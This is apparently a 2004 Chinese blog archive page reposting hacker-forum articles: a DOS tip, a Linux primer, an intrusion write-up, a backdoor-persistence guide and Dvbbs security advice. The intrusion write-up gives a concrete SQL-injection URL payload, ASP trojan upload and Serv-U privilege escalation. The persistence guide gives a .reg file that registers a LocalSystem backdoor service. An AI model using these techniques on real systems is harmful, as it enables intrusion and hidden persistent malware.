日归档：2004 九月-27

转自<EvilOctalSecurity N SecurityPeak BBS> 来源：黑客俱乐部 有的朋友可能遇到过这种情况，当你的windows*作系统无法启动时，你需要在DOS下备份自己的资料，当然拷贝资料用到的DOS命令，大多数用户自己都知道如果*作，但是当你遇到自己的某个文件夹起的是中文名时，在DOS下显示的可是 ASCII码，你总不能用CD ASCII码进入这个文件夹吧!这样的文件夹怎么进入呢？ 　　我来教你一步步进入中文文件夹，首先用dos命令进入包含中文文件夹的当前目录下： 　　第一步: dir >1.txt (注:这个命令是把当前目录列表生成一个文本文件) 　　第二步: edit 1.txt（注:编辑这个文本文件，把其它无关的都删除掉，只留下中文文件夹的ASCII码，在这个ASCII前面加上cd 空格，然后，保存，退出） 　　第三步：ren 1.txt 1.bat （注：这个命令是将1.txt的文本文件改成1.bat的批处理文件） 　　第四步:1回车（注：执行1.bat的批处理文件） 　　好了，你已经进入中文文件夹了!

转自<Hoky Security Team> 转载：情感联盟 你从来只用过Windows，从来没接触过UNIX，只知道把一个文件拽 来拽去，只知道硬盘就是C: D: E:却从来没有研究过分区表，也许 会用VC编个程序，很习惯它的集成环境…. 有一天，不管什么原因了，也许是看报纸上那些把内存和硬盘都分不 清楚的记者的吹嘘，或者是老板要求你用它作个项目，或者是同学 们都有了你没有觉得很土，或者你听说找工作有这个的经验就有更大 希望….不管怎样，你想在自己的机器上安装一个Linux。OK，这个 文章就是给你写的，因为从现在开始，你会有成堆的问题你会觉得从前 在windows那里得来的有关计算机的经验好像完全用不上。你会觉得 "Linux怎么这样麻烦"。你会有种从来没有开过汽车但是得 把汽车拆开修理一样觉得无处下手。OK，这个文章就是为你写的。 为什么要学Linux。其实你不必学习Linux，如果你就是想使用计算机 让它使你的工作，比如打字，排版，统计数据等更有效率，Linux不 行。Windows，或者我推荐windows 2000是你最好的选择，它对中文 的支持很好，非常稳定，上面有无数应用程序，而且如果你自己承担 风险，还可以使用盗版，免费。Linux将会给你造成很多麻烦，安装时 会造成系统数据丢失，无法驱动网卡/声卡/显示卡/显示器，无法配置 中文，图形界面速度慢，等等。从前在windows上很容易做到的比如 修改显示频率或者安装新的网卡驱动在Linux下都变得好像要你自己重 新上一次大一计算机原理课那么讨厌。呵呵，那Linux有什么好处呢？ 你会问。其实Linux没什么好处，从使用角度，它唯一的好处是它是 我们自己的，而windows再好，是Microsoft的。"又能怎么样？" 你也许又问。区别是，Linux可以让你来研究它，通过使用Linux你可以 获得更深一步对计算机的了解 — 而不只是一个全自动的盒子。计算机 是一个很神奇的东西，你也许对那些写出windows的程序员很崇拜(我 是的)，或者对那些能发明更好的算法更安全的操作系统的hacker(对不 起，远程攻击系统的不是hacker)很崇拜，那么你应当知道，坐在一个 windows的机器前面整天就会用鼠标拖拽也许能给你一个很好的打字员 的薪水，但是永远无法让你进入真正计算机的世界 — 成为一个自由 … 继续阅读 →

转自<黑客基地> 作者：rover 前几天听一树说了惊云下载系统的漏洞 问题文件出在admin/user.asp 提交 http://www.xxx.com/down/admin/user.asp?user=admin’ and asc(mid(pwd,1,1))>37 and ’1′=’1 就相当于: select * from UserInfo where user=’admin’ and asc(mid(pwd,1,1))>37 and ’1′=’1′" 详情请见 http://play8.w1.dnscq.net/forum/index.php?showtopic=352 利用access注入得到管理员密码 上面有一个文件upfile.htm 手工利用了下动网的upfile.asp漏洞 就成功上传了个asp木马 然后那个虚拟主机的c，d盘是NTFS分区 不能访问E盘装着servu，php，webmail， F盘是虚拟站点 servu安装目录可写～ 本来打算替换他servu文件的～但是觉的太麻烦 还容易让管理员怀疑 想起servu的本地提升来了 在自己计算机上装了个servu 添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限 然后去servu安装目录里看ServUDaemon.ini 格式是这样的 [GLOBAL] Version=5.0.0.11 … 继续阅读 →

转自<黑客基地> 作者：布衣　　转自：小榕论坛 很多的木马、后门、蠕虫病毒都是通过修改注册表中的RUN键值来实现自启动。但是这种自启动模式不是很隐蔽的，稍微懂点安全的人，一都会查看RUN键值的。本文是另一有效的办法–添加自己的服务。 因为系统对服务的启动是system权限的哦~~ === 系统服务跟以下的注册表几个项目相关： HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServices HKEY_LOCAL_MACHINESYSTEMControlSet001Services HKEY_LOCAL_MACHINESYSTEMControlSet002Services 我们完全可以找到在系统服务中已注册的服务的键值来依样画葫芦。 在以上任何注册表列中添加一个新项： 名字是你想要添加系统服务的名字，比如Backdoor。 在BACKDOOR项下新建一个字符串,数值名称Displayname 数值数据为要添加服务的名称Backdoor。 #### Code #### type addsrv.reg [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSRVTEST] "Type"=dword:00000010 "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):63，3A，5C，77，69，6E，6E，74，5C，6E，75，6B，65，2E，65，78，65 "DisplayName"="SRVTEST" "ObjectName"="LocalSystem" "Description"="系统服务测试" 最后，c:\regedit /s addsrv.reg ，添加服务成功~！服务内容自己改。

转自<黑客基地> 作者：Mesopotamia 　　转自：焦点论坛 本帖子原来是Mesopotamia的投稿文章，被xundi转入论坛。 动网论坛是网络上被广泛使用的一款社区系统，它占领了中国社区系统的大半个江山。正所谓“树大招风”，在几个论坛版本相继被黑客功陷之后. 现在，它的安全性有很大的提高。但是各位站长现在依旧不可忽视其会有继续被功陷的漏洞产生。详情看下文： 这几天，在网上看到了不少有关利用动网插件所产生的脚本漏洞致使其被攻破甚至利用此提升权限权限获取服务器控制权的事情发生。大的有动网的下载中心上传文件过滤不严、入侵动网宝贝工作室修改版这两个。 第一个和动网的UPFILE.ASP文件上传漏洞产生的原因是一样的，这里就不多说了，有兴趣的朋友请翻看相关的资料阅读。 第二个则是由于管理员安装论坛时的疏忽造成的，许多的动网修改版在其目录下都保存有一个可以修改管理员帐号密码的ASP文件，大部分都是用动网的管理员所写的然后改个文字或者面板而变成自己的。这个文件十分的危险。我搜索了一下，用这个文件的论坛不在少数，也就是说，大部分的主机都可轻易的被黑客攻破。 解决方法： 第一个上传漏洞有三种方法可以解决： （1）可以将其更换成别的较为少用的下载系统，下载回来后必须要查看各个文件是否都做了参数的过滤和检查一些时常发生的安全问题。 （2）将down_upfile.asp删除或者为其添加更严格的过滤设置。 （3）将服务器IIS目录的权限设置好，不要让ASP文件有执行权限。 第二个漏洞只有一个办法，就是将密匙文件删除或者转移，千万别留在IIS目录内。因为这个文件可以被当作一个超级的动网ASP后门使用（具体的我不往下说了，免得有更多的论坛遭小黑的毒手[redface]）。 总而言之就一句话：“系统安全是整体，只有牢牢的将每一个小小的细节都处理好了才能减少被”害”的危险。